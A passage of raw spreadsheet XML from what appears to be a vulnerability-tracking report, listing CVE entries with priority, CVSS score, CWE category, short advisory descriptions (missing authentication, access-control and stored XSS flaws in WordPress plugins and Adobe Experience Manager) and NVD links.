      <c r="F731" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr"/>
      <c r="K731" s="5" t="inlineStr"/>
      <c r="L731" s="5" t="inlineStr"/>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr"/>
      <c r="Q731" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="R731" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in moltis-org moltis up to 20260818.10. The affected element is the function vault_unlock_handler/vault_recovery_handler of the file vault.rs. Such manipulation leads to missing authentication. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 20260819.01 is sufficient to fix this issue. The name of the patch is 3b92dd64d5648f829968cf48bf67dc3113852fef. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="S731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86808</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86815</t>
        </is>
      </c>
      <c r="D732" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E732" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F732" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr"/>
      <c r="K732" s="5" t="inlineStr"/>
      <c r="L732" s="5" t="inlineStr"/>
      <c r="M732" s="5" t="inlineStr"/>
      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr"/>
      <c r="Q732" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R732" s="5" t="inlineStr">
        <is>
          <t>The BackWPup  WordPress plugin before 5.7.5 does not properly restrict access to several of its REST API routes for job, backup-destination, and backup-execution management, allowing users holding a BackWPup  WordPress plugin before 5.7.5-defined, administrator-assigned limited role to create and run backup jobs and exfiltrate a full database backup to an attacker-controlled destination.</t>
        </is>
      </c>
      <c r="S732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86815</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64542</t>
        </is>
      </c>
      <c r="D733" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E733" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F733" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr"/>
      <c r="K733" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L733" s="5" t="inlineStr"/>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr"/>
      <c r="Q733" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R733"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33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64542</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64584</t>
        </is>
      </c>
      <c r="D734" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E734" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F734" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L734" s="5" t="inlineStr"/>
      <c r="M734" s="5" t="inlineStr"/>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr"/>
      <c r="Q734" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R734"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34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64584</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64588</t>
        </is>
      </c>
      <c r="D735" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E735" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F735" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr"/>
      <c r="K735" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L735" s="5" t="inlineStr"/>
      <c r="M735" s="5" t="inlineStr"/>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr"/>
      <c r="Q735" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R735"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35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64588</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64589</t>
        </is>
      </c>
      <c r="D736" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E736" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F736" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L736" s="5" t="inlineStr"/>
      <c r="M736" s="5" t="inlineStr"/>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr"/>
      <c r="Q736" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R736"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36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64589</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64610</t>
        </is>
      </c>
      <c r="D737" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E737" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F737" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr"/>
      <c r="K737" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L737" s="5" t="inlineStr"/>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr"/>
      <c r="Q737" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R737"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37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64610</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64618</t>
        </is>
      </c>
      <c r="D738" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E738" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F738" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr"/>
      <c r="K738" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L738" s="5" t="inlineStr"/>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr"/>
      <c r="Q738" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R738"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38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64618</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64830</t>
        </is>
      </c>
      <c r="D739" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E739" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F739" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L739" s="5" t="inlineStr"/>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr"/>
      <c r="Q739" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R739"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39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64830</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64838</t>
        </is>
      </c>
      <c r="D740" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E740" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F740" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L740" s="5" t="inlineStr"/>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr"/>
      <c r="Q740" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R740"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40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64838</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64854</t>
        </is>
      </c>
      <c r="D741" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E741" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F741" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr"/>
      <c r="K741" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L741" s="5" t="inlineStr"/>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr"/>
      <c r="Q741" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R741"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41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64854</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64866</t>
        </is>
      </c>
      <c r="D742" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E742" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F742" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr"/>
      <c r="K742" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L742" s="5" t="inlineStr"/>
      <c r="M742" s="5" t="inlineStr"/>
      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr"/>
      <c r="Q742" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R742"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42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64866</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C743" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64868</t>
        </is>
      </c>
      <c r="D743" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E743" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F743" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I743" s="5" t="inlineStr"/>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L743" s="5" t="inlineStr"/>
      <c r="M743" s="5" t="inlineStr"/>
      <c r="N743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O743" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P743" s="5" t="inlineStr"/>
      <c r="Q743" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R743"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43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64868</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14565</t>
        </is>
      </c>
      <c r="D744" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E744" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F744" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I744" s="5" t="inlineStr"/>
      <c r="J744" s="5" t="inlineStr"/>
      <c r="K744" s="5" t="inlineStr"/>
      <c r="L744" s="5" t="inlineStr"/>
      <c r="M744" s="5" t="inlineStr"/>
      <c r="N744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O744" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P744" s="5" t="inlineStr"/>
      <c r="Q744" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R744" s="5" t="inlineStr">
        <is>
          <t>The advanced-customized-prompts WordPress plugin through 1.0.1 does not perform any capability, ownership, or nonce check before saving popup configuration to a product, nor escape the stored values on output, allowing any authenticated user such as a subscriber to store JavaScript that executes in the browser of visitors viewing the affected product.</t>
        </is>
      </c>
      <c r="S744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14565</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19479</t>
        </is>
      </c>
      <c r="D745" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E745" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F745" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I745" s="5" t="inlineStr"/>
      <c r="J745" s="5" t="inlineStr"/>
      <c r="K745" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L745" s="5" t="inlineStr"/>
      <c r="M745" s="5" t="inlineStr"/>
      <c r="N745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O745" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P745" s="5" t="inlineStr"/>
      <c r="Q745" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R745"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45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19479</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19612</t>
        </is>
      </c>
      <c r="D746" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E746" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F746" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G746" s="5" t="inlineStr"/>
      <c r="H746" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I746" s="5" t="inlineStr"/>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L746" s="5" t="inlineStr"/>
      <c r="M746" s="5" t="inlineStr"/>
      <c r="N746" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O746" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P746" s="5" t="inlineStr"/>
      <c r="Q746" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R746"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46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19612</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19644</t>
        </is>
      </c>
      <c r="D747" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E747" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F747" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I747" s="5" t="inlineStr"/>
      <c r="J747" s="5" t="inlineStr"/>
      <c r="K747" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L747" s="5" t="inlineStr"/>
      <c r="M747" s="5" t="inlineStr"/>
      <c r="N747" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O747" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P747" s="5" t="inlineStr"/>
      <c r="Q747" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R747"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47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19644</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19713</t>
        </is>
      </c>
      <c r="D748" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E748" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F748" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I748" s="5" t="inlineStr"/>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L748" s="5" t="inlineStr"/>
      <c r="M748" s="5" t="inlineStr"/>
      <c r="N748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O748" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P748" s="5" t="inlineStr"/>
      <c r="Q748" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R748"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48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19713</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27227</t>
        </is>
      </c>
      <c r="D749" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E749" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F749" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G749" s="5" t="inlineStr"/>
      <c r="H749" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I749" s="5" t="inlineStr"/>
      <c r="J749" s="5" t="inlineStr"/>
      <c r="K749" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L749" s="5" t="inlineStr"/>
      <c r="M749" s="5" t="inlineStr"/>
      <c r="N749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O749" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P749" s="5" t="inlineStr"/>
      <c r="Q749" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R749"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49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27227</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62133</t>
        </is>
      </c>
      <c r="D750" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E750" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F750" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I750" s="5" t="inlineStr"/>
      <c r="J750" s="5" t="inlineStr"/>
      <c r="K750" s="5" t="inlineStr"/>
      <c r="L750" s="5" t="inlineStr"/>
      <c r="M750" s="5" t="inlineStr"/>
